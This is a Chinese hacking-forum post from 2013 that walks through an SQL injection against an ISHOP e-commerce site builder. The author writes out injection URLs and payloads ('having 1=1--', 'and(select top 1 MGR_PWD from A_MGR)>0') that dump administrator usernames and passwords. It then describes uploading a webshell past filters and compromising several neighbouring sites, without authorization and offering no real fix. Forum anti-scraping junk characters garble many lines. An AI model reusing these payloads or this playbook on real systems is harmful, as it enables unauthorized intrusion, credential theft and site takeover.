中国网络渗透测试联盟

标题: ISHOP商场建站系统注入漏洞 [打印本页]
作者: admin    时间: 2013-4-4 17:40
标题: ISHOP商场建站系统注入漏洞
发现一个注入点7 \3 q5 z4 b3 E  J
http://www.xxx.com /Diary_A.asp?UBID=&DCID=DC2012050610553697&DIID=DI20120506105833899 e/ V+ K6 q5 H2 {. O6 i
$ R. D# D8 L; x2 X" P! v
习惯性的加’having1=1--
! `9 ?6 T' s" Y' @) @: u. @
& k7 H" C% T! G4 h. hhttp://www.xxx.com.tw/Diary_A.asp?UBID=&DCID=DC2012050610553697&DIID=DI2012050610583389’having 1=1—% b0 L$ k$ f0 D/ Z
/ _5 F4 K& j: k2 ?
0
- g3 j0 G# a. n9 Q3 Y
" G# [0 d$ ]2 D7 f  A3 p2 y爆出Diary_A.dl_Title(这时候很激动啊)' I$ |0 }: L4 [! B! s
: |& q2 f/ z+ Z) `) l$ ~* k
那么继续
0 v5 l# }* r. c' g* m2 B* }) x% Phttp://www.xxx.com.tw/Diary_A.asp?UBID=&DCID=DC2012050610553697&DIID=DI2012050610583389’group by dl_Title having 1=1—( Q6 N5 P% }& F' f. Q( s5 `

+ W) r; R. D! {8 r! y3 }继续,一直爆下去
( y& ?* N" g0 i) N
& x: ^1 w6 O+ _5 I7 L爆到几个字段和表段 但是没找到需要的管理用户的字段0 W( G  X' E; w2 T1 }

& j5 [/ R  Y# T6 d蛋疼了 怎么办 然后去后台登陆页看源码" y- r6 G) E1 ], Y! Y

9 V1 l2 c* r; k# T1 K, C8 X0- }3 ^  \# C$ M, o' I2 [9 A
! q0 }- P3 D! M4 V3 ]
Input name= “ADUID”
: P6 a# P# G. b% |6 U' H) BInput name= “ADPWD”
) h/ J& v/ z0 j; s8 p
# M7 I: I/ M; m# K很幸运 找到了字段那就继续* c, v3 a  T% a/ U
找到之后开始爆用户
1 i; @4 {& G! f9 r% j( a( _# r! d2 Bhttp://www.xxx.com.tw/Diary_A.asp?UBID=&DCID=DC2012050610553697&DIID=DI2012050610583389'and(select top 1 MGR_UID from A_MGR)>0—
( l  R: ?- R, m4 y' Y! b爆密码4 F9 A( i; b5 ?1 D' \* M
http://www.xxx.com.tw/Diary_A.asp?UBID=&DCID=DC2012050610553697&DIID=DI2012050610583389'and(select top 1 MGR_PWD from A_MGR)>0—5 t6 s8 ]7 i  I) o
测试了下 这个注入点只能爆到文章哪里的表
% M1 \4 D1 A  U' o& w. g# L* h& l! m3 P& f
头疼 继续 既然只能报道文章哪里的表去后台爆 不过后台字符限制了
0 w  M, H' B; r" y
: ]( |  C7 Y" T6 C又想到 用户登录哪里也可以的吧就去试试 果然 今天我很幸运吧 爆出来了
9 t5 |- }" v  L( G7 [. f0 c5 ~
5 C# U0 l  k6 f& l, M473( k( B. A; L% O$ R% q  v2 N
4 K# D& r3 E# s: H& h% ]- W
进后台6 [+ d9 q( @! C1 M  `) V6 d6 E
- w4 ]) f6 @8 G. h# I

  x0 A7 `5 j6 f( b1 D% m发现几个上传点 有的地方不能上传 而且防止恶意代码  a% ^, U! |( H6 \

5 E8 F% H, Y) C没办法 各种百度各种找大牛 找到一只好像可以突破的马$ m! [: U+ M$ \1 ^
4 ]1 T. s  }: p1 |7 P7 ~5 p

: c' S3 _  @1 t3 T# z在系统管理那里直接上传 不过没有显示地址
5 E- ^5 b7 b: v2 C0 V0 k; `
/ T% k8 T% w! g5 R再上传一次 抓包 搞定OK9 Y& ~8 X) o( T+ D& G
) W* g/ O5 v5 q
" n3 ~; X& G) M; {% L9 y5 c
+ h4 L( }! t! Z( Y5 W# [
472
: V# i7 x/ n* i: A2 U. I
9 c& e8 @- N* ~# q" h晚上不行了 去睡觉。。。+ |4 `- ?/ G4 _( i6 j3 [
第二天刚起床 闲的没事做继续日站吧 0 v7 O# @' q7 s( k. H# P

; z1 @1 `* j. s6 m  ~8 J找个站 就把这个站的旁c扫了下
1 ~8 _: e7 R2 X& w+ A: |! d; O# ?
. n4 ~2 {, J. r& e# v发现c段也有一个购物站 ,然后还和这个站的模板差不多
8 K5 p! X- L1 D, a3 Z! R- X1 Z
就找到会员登录口测试
0 T0 E' t% v/ M* E! h3 J0 R
6 S1 I5 g; k" N$ j9 _4 O, x'and (select top 1 MGR_UID from A_MGR)>0—. W9 i; T* a$ @, ~! I* N
果断爆到了 这时候我很激动 通杀, \4 q  ^* K( H* [" g0 A  h1 \

8 [) c" q1 k. Y# Q7 a; |- U再次翻c段
3 R0 E2 q$ ]4 x; g/ C
& n9 J. Q# u; R0 {: A2 z; E翻出几个站 都成功拿下7 s/ l7 _) o$ R5 f) Q5 F* O* s& P
% Z2 U# W) x' M1 l# r
- R# Z* g. u4 Y- _7 q

2 w* Q4 p! ]1 L修复方案:  N/ M+ S4 ^/ Y4 X% l$ _" p* M
他们比我专业 . |+ ]" y2 J6 b1 U9 |4 @% J
8 Q  `1 u7 r1 u1 Q; M$ i3 G. }
( ]4 S9 z" r5 n3 D1 m

" F8 R/ `0 g$ }9 f1 w/ c8 e+ ^& G# n



欢迎光临 中国网络渗透测试联盟 (https://www.cobjon.com/) Powered by Discuz! X3.2